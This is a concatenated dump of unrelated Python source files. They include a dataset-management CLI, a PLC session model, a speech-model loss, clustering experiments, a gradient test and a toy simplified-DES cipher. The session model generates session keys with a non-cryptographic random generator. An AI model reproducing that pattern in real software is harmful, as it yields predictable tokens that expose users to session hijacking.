Tuple, Union\n\nimport click\n\nfrom ..__verison__ import __version__\nfrom ..dataset import Data, Segment\nfrom ..utility import TBRN, TBRNType\nfrom .gas import GAS\nfrom .requests import default_config\nfrom .segment import FusionSegmentClient, SegmentClient\n\n\ndef _config_filepath() -> str:\n \"\"\"Get the path of the config file.\n\n Returns:\n The path of the config file.\n\n \"\"\"\n home = \"USERPROFILE\" if os.name == \"nt\" else \"HOME\"\n return os.path.join(os.environ[home], \".gasconfig\")\n\n\ndef _read_config(config_filepath: str, profile_name: str) -> Tuple[str, str]:\n \"\"\"Read accessKey and URL from the config file.\n\n Arguments:\n config_filepath: The file containing config info.\n profile_name: The environment to login.\n\n Returns:\n The accessKey of profile_name read from the config file.\n The URL of profile_name read from the config file.\n\n \"\"\"\n if not os.path.exists(config_filepath):\n click.echo(\n f\"{config_filepath} not exist\"\n \"\\n\\nPlease use 'gas config ' to create config file\",\n err=True,\n )\n sys.exit(1)\n\n config_parser = ConfigParser()\n config_parser.read(config_filepath)\n access_key = config_parser[profile_name][\"accessKey\"]\n url = config_parser[profile_name][\"url\"] if \"url\" in config_parser[profile_name] else \"\"\n return access_key, url\n\n\ndef _gas(access_key: str, url: str, profile_name: str) -> GAS:\n \"\"\"Load an object of :class:`~tensorbay.client.gas.GAS`.\n\n We will read accessKey and URL from the appointed profile_name and login gas.\n\n Arguments:\n access_key: The accessKey of gas.\n url: The login URL.\n profile_name: The environment to login.\n\n Returns:\n Gas client logged in with accessKey and URL.\n\n \"\"\"\n if not access_key and not url:\n access_key, url = _read_config(_config_filepath(), profile_name)\n\n if not access_key:\n click.echo(\"accessKey should be appointed\", err=True)\n sys.exit(1)\n\n return GAS(access_key, url)\n\n\n@click.group()\n@click.version_option(__version__)\n@click.option(\"-k\", \"--key\", \"access_key\", type=str, default=\"\", help=\"The accessKey of gas.\")\n@click.option(\"-u\", \"--url\", type=str, default=\"\", help=\"The login url.\", hidden=True)\n@click.option(\n \"-p\",\n \"--profile\",\n \"profile_name\",\n type=str,\n default=\"default\",\n help=\"The environment to login.\",\n)\n@click.option(\"-d\", \"--debug\", is_flag=True, help=\"Debug mode.\")\n@click.pass_context\ndef cli(ctx: click.Context, access_key: str, url: str, profile_name: str, debug: bool) -> None:\n \"\"\"You can use 'gas' + COMMAND to operate on your dataset.\\f\n\n Arguments:\n ctx: The context to be passed as the first argument.\n access_key: The accessKey of gas.\n url: The login URL.\n profile_name: The environment to login.\n debug: Debug mode flag.\n\n \"\"\" # noqa: D301,D415\n ctx.obj = {\n \"access_key\": access_key,\n \"url\": url,\n \"profile_name\": profile_name,\n }\n default_config._x_source = \"PYTHON-CLI\" # pylint: disable=protected-access\n\n if debug:\n logging.basicConfig(level=logging.DEBUG)\n\n\n@cli.command()\n@click.argument(\"name\", type=str)\n@click.pass_obj\ndef create(obj: Dict[str, str], name: str) -> None:\n \"\"\"Create a dataset.\\f\n\n Arguments:\n obj: A dict including config information.\n name: The name of the dataset to be created, like \"tb:KITTI\".\n\n \"\"\" # noqa: D301,D415\n info = TBRN(tbrn=name)\n if info.type != TBRNType.DATASET:\n click.echo(f'\"{name}\" is not a dataset', err=True)\n sys.exit(1)\n _gas(**obj).create_dataset(info.dataset_name)\n\n\n# @cli.command()\n# @click.argument(\"name\", type=str)\n# @click.argument(\"message\", type=str)\n# @click.argument(\"tag\", type=str, required=False)\n# @click.pass_obj\n# def commit(obj: Dict[str, str], name: str, message: str, tag: str) -> None:\n# \"\"\"Commit a dataset.\\f\n\n# Arguments:\n# obj: A dict including config information.\n# name: The name of the dataset to be committed, like \"tb:KITTI\".\n# message: The message of the dataset to be committed.\n# tag: The tag of the dataset to be committed.\n\n# \"\"\"\n# info = TBRN(tbrn=name)\n# if info.type != TBRNType.DATASET:\n# click.echo(f'\"{name}\" is not a dataset', err=True)\n# sys.exit(1)\n# dataset = _gas(**obj)._get_dataset(info.dataset_name) # pylint: disable=protected-access\n# dataset.commit(message, tag=tag)\n\n\n@cli.command()\n@click.argument(\"name\", type=str)\n@click.option(\"-y\", \"--yes\", is_flag=True, help=\"Confirm to delete the dataset completely.\")\n@click.pass_obj\ndef delete(obj: Dict[str, str], name: str, yes: bool) -> None:\n \"\"\"Delete a dataset.\\f\n\n Arguments:\n obj: A dict including config info.\n name: The name of the dataset to be deleted, like \"tb:KITTI\".\n yes: Confirm to delete the dataset completely.\n\n \"\"\" # noqa: D301,D415\n info = TBRN(tbrn=name)\n if info.type != TBRNType.DATASET:\n click.echo(f'\"{name}\" is not a dataset', err=True)\n sys.exit(1)\n\n if not yes:\n click.confirm(\n f'Dataset \"{name}\" will be completely deleted.\\nDo you want to continue?', abort=True\n )\n\n _gas(**obj).delete_dataset(info.dataset_name)\n\n\ndef _get_segment_object(\n segment_name: str,\n local_abspaths: Iterable[str],\n remote_path: str,\n is_recursive: bool,\n) -> Segment:\n \"\"\"Get the pair of local_path and remote_path.\n\n Arguments:\n segment_name: The name of the segment these data belong to.\n local_abspaths: A list of local abstract paths, could be folder or file.\n remote_path: The remote object path, not necessarily end with '/'.\n is_recursive: Whether copy directories recursively.\n\n Returns:\n A segment contains mapping data.\n\n \"\"\"\n segment = Segment(segment_name)\n for local_abspath in local_abspaths:\n if not os.path.isdir(local_abspath):\n data = Data(\n local_abspath,\n target_remote_path=str(PurePosixPath(remote_path, os.path.basename(local_abspath))),\n )\n segment.append(data)\n continue\n\n if not is_recursive:\n click.echo(\n \"Error: local paths include directories, please use -r option\",\n err=True,\n )\n sys.exit(1)\n\n local_abspath = os.path.normpath(local_abspath)\n folder_name = os.path.basename(local_abspath)\n for root, _, filenames in os.walk(local_abspath):\n relpath = os.path.relpath(root, local_abspath) if root != local_abspath else \"\"\n for filename in filenames:\n data = Data(\n os.path.join(root, filename),\n target_remote_path=str(\n PurePosixPath(Path(remote_path, folder_name, relpath, filename))\n ),\n )\n segment.append(data)\n return segment\n\n\ndef _echo_segment(\n dataset_name: str,\n segment_name: str,\n segment: Union[SegmentClient, FusionSegmentClient],\n list_all_files: bool,\n) -> None:\n \"\"\"Echo a segment.\n\n Arguments:\n dataset_name: The name of the dataset.\n segment_name: The name of the segment.\n segment: A segment or a fusion segment.\n list_all_files: Only works when segment is a fusion one.\n If False, list frame indexes only.\n If True, list sensors and files, too.\n\n \"\"\"\n if isinstance(segment, SegmentClient):\n _echo_data(dataset_name, segment_name, segment.list_data_paths())\n else:\n frames = segment.list_frames()\n if not list_all_files:\n for index, _ in enumerate(frames):\n click.echo(TBRN(dataset_name, segment_name, index).get_tbrn())\n else:\n for index, frame in enumerate(frames):\n for sensor_name, data in frame.items():\n click.echo(\n TBRN(\n dataset_name,\n segment_name,\n index,\n sensor_name,\n remote_path=data.path,\n )\n )\n\n\ndef _echo_data(dataset_name: str, segment_name: str, data_iter: Iterable[str]) -> None:\n \"\"\"Echo files in data_iter under 'tb:dataset_name:segment_name'.\n\n Arguments:\n dataset_name: The name of the dataset the segment belongs to.\n segment_name: The name of the segment.\n data_iter: Iterable data to be echoed.\n\n \"\"\"\n for data in data_iter:\n click.echo(TBRN(dataset_name, segment_name, remote_path=data).get_tbrn())\n\n\ndef _ls_dataset(gas: GAS, info: TBRN, list_all_files: bool) -> None:\n dataset = gas._get_dataset_with_any_type(info.dataset_name) # pylint: disable=protected-access\n segment_names = dataset.list_segment_names()\n if not list_all_files:\n for segment_name in segment_names:\n click.echo(TBRN(info.dataset_name, segment_name).get_tbrn())\n return\n\n for segment_name in segment_names:\n segment = dataset.get_segment(segment_name)\n _echo_segment(info.dataset_name, segment_name, segment, list_all_files)\n\n\ndef _ls_segment(gas: GAS, info: TBRN, list_all_files: bool) -> None:\n dataset = gas._get_dataset_with_any_type(info.dataset_name) # pylint: disable=protected-access\n _echo_segment(\n info.dataset_name, info.segment_name, dataset.get_segment(info.segment_name), list_all_files\n )\n\n\ndef _ls_frame(gas: GAS, info: TBRN, list_all_files: bool) -> None:\n dataset_client = gas.get_dataset(info.dataset_name, is_fusion=True)\n segment_client = dataset_client.get_segment(info.segment_name)\n\n try:\n frame = segment_client.list_frames()[info.frame_index]\n except IndexError:\n click.echo(f'No such frame: \"{info.frame_index}\"!', err=True)\n sys.exit(1)\n\n if not list_all_files:\n for sensor_name in frame:\n click.echo(TBRN(info.dataset_name, info.segment_name, info.frame_index, sensor_name))\n else:\n for sensor_name, data in frame.items():\n click.echo(\n TBRN(\n info.dataset_name,\n info.segment_name,\n info.frame_index,\n sensor_name,\n remote_path=data.path,\n )\n )\n\n\ndef _ls_sensor(\n gas: GAS,\n info: TBRN,\n list_all_files: bool, # pylint: disable=unused-argument\n) -> None:\n dataset_client = gas.get_dataset(info.dataset_name, is_fusion=True)\n segment_client = dataset_client.get_segment(info.segment_name)\n try:\n frame = segment_client.list_frames()[info.frame_index]\n except IndexError:\n click.echo(f'No such frame: \"{info.frame_index}\"!', err=True)\n sys.exit(1)\n\n data = frame[info.sensor_name]\n click.echo(\n TBRN(\n info.dataset_name,\n info.segment_name,\n info.frame_index,\n info.sensor_name,\n remote_path=data.path,\n )\n )\n\n\ndef _ls_fusion_file(\n gas: GAS,\n info: TBRN,\n list_all_files: bool, # pylint: disable=unused-argument\n) -> None:\n dataset_client = gas.get_dataset(info.dataset_name, is_fusion=True)\n segment_client = dataset_client.get_segment(info.segment_name)\n try:\n frame = segment_client.list_frames()[info.frame_index]\n except IndexError:\n click.echo(f'No such frame: \"{info.frame_index}\"!', err=True)\n sys.exit(1)\n\n if frame[info.sensor_name].path != info.remote_path:\n click.echo(f'No such file: \"{info.remote_path}\"!', err=True)\n sys.exit(1)\n\n click.echo(info)\n\n\ndef _ls_normal_file( # pylint: disable=unused-argument\n gas: GAS, info: TBRN, list_all_files: bool\n) -> None:\n dataset_client = gas.get_dataset(info.dataset_name)\n segment_client = dataset_client.get_segment(info.segment_name)\n _echo_data(\n info.dataset_name,\n info.segment_name,\n _filter_data(segment_client.list_data_paths(), info.remote_path),\n )\n\n\n_LS_FUNCS = {\n TBRNType.DATASET: _ls_dataset,\n TBRNType.SEGMENT: _ls_segment,\n TBRNType.NORMAL_FILE: _ls_normal_file,\n TBRNType.FRAME: _ls_frame,\n TBRNType.FRAME_SENSOR: _ls_sensor,\n TBRNType.FUSION_FILE: _ls_fusion_file,\n}\n\n\n@cli.command()\n@click.argument(\"tbrn\", type=str, default=\"\")\n@click.option(\n \"-a\", \"--all\", \"list_all_files\", is_flag=True, help=\"List all files under the segment.\"\n)\n@click.pass_obj\ndef ls( # pylint: disable=invalid-name\n obj: Dict[str, str], tbrn: str, list_all_files: bool\n) -> None:\n \"\"\"List data under the path. If path is empty, list the names of all datasets.\\f\n\n Arguments:\n obj: A dict contains config information.\n tbrn: Path to be listed, like \"tb:KITTI:seg1\". If empty, list names of all datasets.\n list_all_files: If true, list all files under the segment.\n\n \"\"\" # noqa: D301,D415\n gas = _gas(**obj)\n\n if not tbrn:\n for dataset_name in gas.list_dataset_names():\n click.echo(TBRN(dataset_name).get_tbrn())\n return\n\n info = TBRN(tbrn=tbrn)\n _LS_FUNCS[info.type](gas, info, list_all_files)\n\n\ndef _filter_data(\n data_list: Iterable[str], remote_path: str, is_recursive: bool = True\n) -> Iterator[str]:\n \"\"\"Get a list of paths under the remote_path.\n\n Arguments:\n data_list: A list of candidate paths.\n remote_path: The remote path to filter data.\n is_recursive: Whether to filter data recursively.\n\n Returns:\n A list of paths under the given remote_path.\n\n \"\"\"\n if is_recursive:\n return (\n filter(lambda x: x.startswith(remote_path), data_list)\n if remote_path.endswith(\"/\")\n else filter(lambda x: x.startswith(remote_path + \"/\") or x == remote_path, data_list)\n )\n return filter(lambda x: x == remote_path, data_list)\n\n\n#\n# @cli.command()\n# @click.argument(\"tbrn\", type=str)\n# @click.option(\n# \"-r\", \"--recursive\", \"is_recursive\", is_flag=True, help=\"Remove directories recursively.\"\n# )\n# @click.option(\"-f\", \"--force\", \"force_delete\", is_flag=True, help=\"Force to delete any segment.\")\n# @click.pass_obj\n# # pylint: disable=invalid-name\n# def rm(obj: Dict[str, str], tbrn: str, is_recursive: bool, force_delete: bool) -> None:\n# \"\"\"Remove the remote paths.\\f\n#\n# :param obj: a dict including config info\n# :param tbrn: path to be removed, like \"tb:KITTI:seg1\".\n# :param is_recursive: whether remove directories recursively\n# :param force_delete: sensor and its objects will also be deleted if True,\n# else only segment with no sensor can be deleted.\n# \"\"\"\n# gas = _gas(**obj)\n# info = TBRN(tbrn=tbrn)\n# dataset = gas.get_dataset(info.dataset_name)\n#\n# if info.type == TBRNType.DATASET:\n# if not is_recursive:\n# click.echo(\"Error: please use -r option to remove the whole dataset\", err=True)\n# sys.exit(1)\n# segment_names = dataset.list_segment_names()\n# dataset.delete_segments(segment_names, force_delete)\n# return\n#\n# if info.type == TBRNType.SEGMENT:\n# if not is_recursive:\n# click.echo(\"Error: please use -r option to remove the whole segment\", err=True)\n# sys.exit(1)\n# dataset.delete_segments(info.segment_name, force_delete)\n# return\n#\n# if info.type == TBRNType.NORMAL_FILE:\n# if not is_recursive and info.remote_path.endswith(\"/\"):\n# click.echo(\"Error: please use -r option to remove recursively\", err=True)\n# sys.exit(1)\n#\n# segment = dataset.get_segment(info.segment_name)\n# filter_data = list(_filter_data(segment.list_data(), info.remote_path, is_recursive))\n# if not filter_data:\n# echo_info = \"file or directory\" if is_recursive else \"file\"\n# click.echo(f'Error: no such {echo_info} \"{tbrn}\" ', err=True)\n# sys.exit(1)\n# segment.delete_data(filter_data)\n# return\n#\n# click.echo(f'\"{tbrn}\" is an invalid path to remove', err=True)\n# sys.exit(1)\n\n\n@cli.command()\n@click.argument(\"access_key\", type=str, default=\"\")\n@click.argument(\"url\", type=str, default=\"\")\n@click.pass_obj\ndef config(obj: Dict[str, str], access_key: str, url: str) -> None:\n \"\"\"Configure the accessKey (and URL) of gas.\\f\n\n Arguments:\n obj: A dict contains config information.\n access_key: The accessKey of gas to write into config file.\n url: The URL of gas to write into config file.\n\n \"\"\" # noqa: D301,D415\n config_file = _config_filepath()\n config_parser = ConfigParser()\n config_parser.read(config_file)\n\n if not access_key:\n for profile_name in config_parser.sections():\n click.echo(f\"[{profile_name}]\")\n for key, value in config_parser[profile_name].items():\n click.echo(f\"{key} = {value}\")\n return\n\n if not access_key.startswith((\"Accesskey-\", \"ACCESSKEY-\")):\n click.echo(\"Error: Wrong accesskey format\", err=True)\n sys.exit(1)\n\n profile_name = obj[\"profile_name\"]\n if profile_name == \"config\":\n click.echo(\"Error: name 'config' is preserved for gas basic config\", err=True)\n sys.exit(1)\n\n if profile_name not in config_parser:\n config_parser.add_section(profile_name)\n\n config_parser[profile_name][\"accessKey\"] = access_key\n if url:\n config_parser[profile_name][\"url\"] = url\n else:\n config_parser.remove_option(profile_name, \"url\")\n\n with open(config_file, \"w\") as fp:\n config_parser.write(fp)\n\n click.echo(f\"Success!\\nConfiguration has been written into: {config_file}\")\n\n\nif __name__ == \"__main__\":\n cli() # pylint: disable=no-value-for-parameter\n","sub_path":"tensorbay/client/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":18464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"378168855","text":"import random\nimport base64\nimport time\n\nfrom PLC.Faults import *\nfrom PLC.Parameter import Parameter\nfrom PLC.Filter import Filter\nfrom PLC.Debug import profile\nfrom PLC.Table import Row, Table\nfrom PLC.Persons import Person, Persons\nfrom PLC.Nodes import Node, Nodes\n\nclass Session(Row):\n \"\"\"\n Representation of a row in the sessions table. To use, instantiate\n with a dict of values.\n \"\"\"\n\n table_name = 'sessions'\n primary_key = 'session_id'\n join_tables = ['person_session', 'node_session']\n fields = {\n 'session_id': Parameter(str, \"Session key\"),\n 'person_id': Parameter(int, \"Account identifier, if applicable\"),\n 'node_id': Parameter(int, \"Node identifier, if applicable\"),\n 'expires': Parameter(int, \"Date and time when session expires, in seconds since UNIX epoch\"),\n }\n\n def validate_expires(self, expires):\n if expires < time.time():\n raise PLCInvalidArgument(\"Expiration date must be in the future\")\n\n return time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime(expires))\n\n add_person = Row.add_object(Person, 'person_session')\n\n def add_node(self, node, commit = True):\n # Nodes can have only one session at a time\n self.api.db.do(\"DELETE FROM node_session WHERE node_id = %d\" % \\\n node['node_id'])\n\n add = Row.add_object(Node, 'node_session')\n add(self, node, commit = commit)\n\n def sync(self, commit = True, insert = None):\n if 'session_id' not in self:\n # Before a new session is added, delete expired sessions\n expired = Sessions(self.api, expires = -int(time.time()))\n for session in expired:\n session.delete(commit)\n\n # Generate 32 random bytes\n int8s = random.sample(range(0, 256), 32)\n # Base64 encode their string representation\n self['session_id'] = base64.b64encode(bytes(int8s)).decode()\n # Force insert\n insert = True\n\n Row.sync(self, commit, insert)\n\nclass Sessions(Table):\n \"\"\"\n Representation of row(s) from the session table in the database.\n \"\"\"\n\n def __init__(self, api, session_filter = None, expires = int(time.time())):\n Table.__init__(self, api, Session)\n\n sql = \"SELECT %s FROM view_sessions WHERE True\" % \\\n \", \".join(Session.fields)\n\n if session_filter is not None:\n if isinstance(session_filter, (list, tuple, set)):\n # Separate the list into integers and strings\n ints = [x for x in session_filter if isinstance(x, int)]\n strs = [x for x in session_filter if isinstance(x, str)]\n session_filter = Filter(Session.fields, {'person_id': ints, 'session_id': strs})\n sql += \" AND (%s) %s\" % session_filter.sql(api, \"OR\")\n elif isinstance(session_filter, dict):\n session_filter = Filter(Session.fields, session_filter)\n sql += \" AND (%s) %s\" % session_filter.sql(api, \"AND\")\n elif isinstance(session_filter, int):\n session_filter = Filter(Session.fields, {'person_id': session_filter})\n sql += \" AND (%s) %s\" % session_filter.sql(api, \"AND\")\n elif isinstance(session_filter, str):\n session_filter = Filter(Session.fields, {'session_id': session_filter})\n sql += \" AND (%s) %s\" % session_filter.sql(api, \"AND\")\n else:\n raise PLCInvalidArgument(\"Wrong session filter\"%session_filter)\n\n if expires is not None:\n if expires >= 0:\n sql += \" AND expires > %(expires)d\"\n else:\n expires = -expires\n sql += \" AND expires < %(expires)d\"\n\n self.selectall(sql, locals())\n","sub_path":"PLC/Sessions.py","file_name":"Sessions.py","file_ext":"py","file_size_in_byte":3826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"580547903","text":"import torch\r\nimport torch.nn as nn\r\nimport hparams as hp\r\n\r\nclass FastSpeech2Loss(nn.Module):\r\n \"\"\" FastSpeech2 Loss \"\"\"\r\n\r\n def __init__(self, reduction='mean'):\r\n super(FastSpeech2Loss, self).__init__()\r\n self.mse_loss = nn.MSELoss(reduction=reduction)\r\n self.mae_loss = nn.L1Loss(reduction=reduction)\r\n\r\n def forward(self, d_predicted, d_target, p_predicted, p_target, e_predicted, e_target, mel, mel_postnet, mel_target):\r\n d_target.requires_grad = False\r\n p_target.requires_grad = False\r\n e_target.requires_grad = False\r\n mel_target.requires_grad = False\r\n\r\n mel_loss = self.mse_loss(mel, mel_target)\r\n mel_postnet_loss = self.mse_loss(mel_postnet, mel_target)\r\n\r\n d_loss = self.mae_loss(d_predicted, d_target.float())\r\n p_loss = self.mae_loss(p_predicted, p_target)\r\n e_loss = self.mae_loss(e_predicted, e_target)\r\n \r\n return mel_loss, mel_postnet_loss, d_loss, p_loss, e_loss\r\n","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"229464578","text":"import copy\nclass Solution(object):\n def traverse(self, board, w, row, col, i, j):\n idx=1\n brd=copy.deepcopy(board)\n while(idx0 and brd[i-1][j]==w[idx]):\n i-=1\n elif(i<(row-1) and brd[i+1][j]==w[idx]):\n i+=1\n elif(j<(col-1) and brd[i][j+1]==w[idx]):\n j=j+1\n elif(j>0 and brd[i][j-1]==w[idx]):\n j-=1\n else:\n return False\n idx+=1 \n return True\n \n def findWords(self, board, words):\n \"\"\"\n :type board: List[List[str]]\n :type words: List[str]\n :rtype: List[str]\n \"\"\"\n row=len(board)\n col=len(board[0])\n ans = []\n for each in words:\n for i in range(len(board)):\n for j in range(len(board[0])):\n if board[i][j]==each[0]:\n if(self.traverse(board, each, row, col, i, j) is True):\n if each not in ans:\n ans.append(each)\n \n return ans\n \n \n","sub_path":"Word Search II.py","file_name":"Word Search II.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"351630960","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.cluster import KMeans\nfrom numpy import genfromtxt\nfrom scipy import cluster\nfrom scipy.spatial.distance import cdist\nfrom numpy.random import randint\nimport numpy.linalg as la\nfrom timeit import timeit\n\nX = genfromtxt('data/data-clustering-1.csv', delimiter=',').T\n\n\ndef plot_kmeans_result(centroids, labels, k, ax):\n ax.scatter(X[:, 0], X[:, 1], c=labels, alpha=0.7, cmap='brg')\n ax.scatter(centroids[:, 0], centroids[:, 1], c='black', marker='s')\n ax.scatter(centroids[:, 0], centroids[:, 1], c=range(k), marker='+', cmap='brg')\n\n\ndef profile_kmeans_algorithm(algo_fn, k=3, profile_reps=100):\n # run algorithm explicitly to compare results\n name = algo_fn.__name__\n\n fig, axs = plt.subplots(2, 2, True, True)\n fig.suptitle(name)\n\n for i in np.ndindex(2, 2):\n centroids, labels = algo_fn(X, k)\n plot_kmeans_result(centroids, labels, k, axs[i])\n\n\n # use timeit to profile execution times\n avg_time = timeit(name + '(X, 3)', 'from __main__ import ' + name + \", X\", number=profile_reps)\n avg_time /= profile_reps\n print(name, \"avg time =\", avg_time, \"per execution\")\n\n fig.suptitle(\"{}\\navg runtime: {:.4f}secs\".format(name,avg_time))\n #plt.savefig('{}_multi.png'.format(name), dpi=200, transparent=True)\n\n\ndef lloyds_algorithm(data, k):\n kmeans = KMeans(n_clusters=k, n_init=1, max_iter=500)\n kmeans.fit(data)\n return kmeans.cluster_centers_, kmeans.labels_\n\n\ndef hartigan_algorithm(data, k):\n # select initial labels randomly\n labels = np.random.randint(0, k, data.shape[0])\n\n centroids = np.zeros((k, 2))\n class_errors = np.zeros(k)\n assignment_errors = np.zeros(k)\n\n converged = False\n while not converged:\n converged = True\n for j in range(data.shape[0]):\n i = labels[j]\n\n for ni in range(k):\n # suppose datapoint j is added to centroid ni\n labels[j] = ni\n\n # recalculate centers and erros\n for l in range(k):\n cur_data = data[labels == l]\n centroids[l] = np.mean(cur_data, axis=0)\n class_errors[l] = np.linalg.norm(cur_data - centroids[l]) ** 2\n\n assignment_errors[ni] = np.sum(class_errors)\n\n w = np.argmin(assignment_errors) # index of assignment with lowest error\n\n if i != w:\n converged = False\n\n labels[j] = w\n\n # calculate centers again after last assignment\n centroids = np.array([np.mean(data[labels == l], axis=0) for l in range(k)])\n return centroids, labels\n\n\ndef macqueen_algorithm(data, k):\n initial_centroid_idx = np.random.randint(0, data.shape[0], size=k)\n centroids = data[initial_centroid_idx]\n cluster_size = np.zeros(k)\n labels = np.zeros(data.shape[0])\n\n # compute winner clusters for each data point\n for i, p in enumerate(data):\n distances = np.linalg.norm(centroids - p, axis=1) ** 2\n closest_idx = np.argmin(distances)\n labels[i] = closest_idx\n cluster_size[closest_idx] += 1\n centroids[closest_idx] += 1. / cluster_size[closest_idx] * (p - centroids[closest_idx])\n\n return centroids, labels\n\n\nplt.scatter(X[:,0],X[:,1], c='black', alpha=0.7)\nplt.suptitle('data points to be clustered')\n# plt.savefig('kmeans_data.png', dpi=200, transparent=True)\nprofile_kmeans_algorithm(lloyds_algorithm, 3)\nprofile_kmeans_algorithm(hartigan_algorithm, 3)\nprofile_kmeans_algorithm(macqueen_algorithm, 3)\n\nplt.show()\n","sub_path":"Project03/final/task3_1.py","file_name":"task3_1.py","file_ext":"py","file_size_in_byte":3563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"262958907","text":"##\n# This software was developed and / or modified by Raytheon Company,\n# pursuant to Contract DG133W-05-CQ-1067 with the US Government.\r\n# \r\n# U.S. EXPORT CONTROLLED TECHNICAL DATA\r\n# This software product contains export-restricted data whose\n# export/transfer/disclosure is restricted by U.S. law. Dissemination\n# to non-U.S. persons whether in the United States or abroad requires\n# an export license or other authorization.\n# \n# Contractor Name: Raytheon Company\r\n# Contractor Address: 6825 Pine Street, Suite 340\r\n# Mail Stop B8\r\n# Omaha, NE 68106\r\n# 402.291.0100\r\n# \r\n# See the AWIPS II Master Rights File (\"Master Rights File.pdf\") for\n# further licensing information.\n##\n\n\nimport unittest\nimport numpy as np\nimport Gradient\n\nclass TestGradient(unittest.TestCase):\n def setUp(self):\n self.data = np.ones((5,5), dtype=np.float32) * 2.0\n np.cumsum(self.data, axis=0, out=self.data)\n np.cumsum(self.data, axis=1, out=self.data)\n \n self.dx = np.ones((5,5), dtype=np.float32) * 0.5\n self.dy = np.ones((5,5), dtype=np.float32) * 0.5\n \n def testMath(self):\n \"Check that simple gradients match expectations.\"\n grd_u, grd_v = Gradient.execute(self.data, self.dx, self.dy)\n correct_u = np.array([[1e37, 1e37, 1e37, 1e37, 1e37],\n [ 4.0, 8.0, 12.0, 16.0, 20.0],\n [ 4.0, 8.0, 12.0, 16.0, 20.0],\n [ 4.0, 8.0, 12.0, 16.0, 20.0],\n [1e37, 1e37, 1e37, 1e37, 1e37]], dtype=np.float32)\n correct_v = correct_u.transpose()\n if not np.allclose(grd_u, correct_u):\n self.fail(\"\" + repr(grd_u));\n\n if not np.allclose(grd_v, correct_v):\n self.fail(\"\" + repr(grd_v))\n \n def testClean(self):\n \"Check that input arrays are not modified.\"\n self.data[1,1] = 1e37\n self.dx[1,1] = 1e37\n self.dy[1,1] = 1e37\n dataCopy = np.copy(self.data)\n dxCopy = np.copy(self.dx)\n dyCopy = np.copy(self.dy)\n dontcare_u, dontcare_v = Gradient.execute(self.data, self.dx, self.dy)\n if not np.allclose(self.data, dataCopy):\n fail(\"Data was changed.\")\n if not np.allclose(self.dx, dxCopy):\n fail(\"dx was changed.\")\n if not np.allclose(self.dy, dyCopy):\n fail(\"dy was changed.\")","sub_path":"cave/com.raytheon.uf.viz.derivparam.python/localization/derivedParameters/functions/TestGradient.py","file_name":"TestGradient.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"90477986","text":"\n##---------------------------------------------------------- Left Circular Shift * OK\ndef left_circular_shift(data, shift):\n shift = shift%len(data)\n #return data[len(data)-shift:] + data[:len(data)-shift] <- Right Circular Shift\n return data[shift:len(data)] + data[:shift]\n\n##----------------------------------------------------------------------- PBOXES * OK\ndef p8(data, verbose = False, table=[6,3,7,4,8,5,10,9]):\n if len(data) == 10:\n return ''.join([data[k-1] for k in table])\n return None\n\ndef p10(data, verbose = False, table = [3, 5, 2, 7, 4, 10, 1, 9, 8, 6]):\n if len(data) == 10:\n return ''.join([data[k-1] for k in table])\n return None\n\ndef p4(data, verbose = False, table=[2,4,3,1]):\n if len(data) == 4:\n return ''.join([data[k-1] for k in table])\n return None\n\n##----------------------------------------------------------------------- SBOXES * OK\n\ndef sbox1(a, b, c, d):\n box = [[1,0,3,2],[3,2,1,0],[0,2,1,3],[3,1,3,2]]\n row = int(\"0b\"+''.join(map(str, [a,d])), 2)\n column = int(\"0b\"+''.join(map(str, [b,c])), 2)\n return bin(box[row][column])[2:].ljust(2,\"0\")\n\n\ndef sbox2(a, b, c, d):\n box = [[0,1,2,3],[2,0,1,3],[3,0,1,0],[2,1,0,3]]\n row = int(\"0b\"+''.join(map(str, [a,d])), 2)\n column = int(\"0b\"+''.join(map(str, [b,c])), 2)\n return bin(box[row][column])[2:].ljust(2,\"0\")\n\n##----------------------------------------------------------------------- keygen * OK\ndef keygen(key, verbose = False):\n if verbose:\n print(\"[KEYG] Entering KEYGEN\")\n key = p10(key)\n rkey, lkey = key[int(len(key)/2):], key[:int(len(key)/2)]\n if verbose:\n print(\"[KEYG] rkey, lkey = \", rkey, lkey)\n print(\"[KEYG] LCS(rkey,1) , LCS(lkey,1) = \", left_circular_shift(rkey, 1), left_circular_shift(lkey, 1))\n print(\"[KEYG] LCS(rkey,2) , LCS(lkey,2) = \", left_circular_shift(rkey, 2), left_circular_shift(lkey, 2))\n subkey1 = p8(left_circular_shift(lkey, 1) + left_circular_shift(rkey, 1))\n subkey2 = p8(left_circular_shift(lkey, 3) + left_circular_shift(rkey, 3))\n if verbose:\n print(\"[KEYG] Exiting KEYGEN with :\\n | subkey1 :\",subkey1,\"\\n | subkey2 :\",subkey2)\n return subkey1, subkey2\n\n##----------------------------------------------------------------------------IP * OK\ndef initial_permutation(data, verbose = False, table=[2,6,3,1,4,8,5,7]):\n if verbose:\n print(\"[ IP ] Entering initial_permutation with data :\", data)\n if len(data) == 8:\n if verbose:\n print(\"[ IP ] Leaving initial_permutation with data :\", ''.join([data[k-1] for k in table]))\n return ''.join([data[k-1] for k in table])\n return None\n\ndef initial_permutation_reverse(data, verbose = False, table=[4,1,3,5,7,2,8,6]):\n if verbose:\n print(\"[IP-1] Entering initial_permutation_reverse with data :\", data)\n if len(data) == 8:\n if verbose:\n print(\"[IP-1] Leaving initial_permutation_reverse with data :\", ''.join([data[k-1] for k in table]))\n return ''.join([data[k-1] for k in table])\n return None\n\n##--------------------------------------------------------------------- expander * OK\n\ndef expander(data, verbose = False, table=[4,1,2,3,2,3,4,1]):\n if len(data) == 4:\n return ''.join([data[k-1] for k in table])\n return None\n\n##--------------------------------------------------------------------------- fk\n\ndef fk(data, subkey, verbose = False):\n print(\"[ fk ] Entering fk with data:\", data, \"and subkey 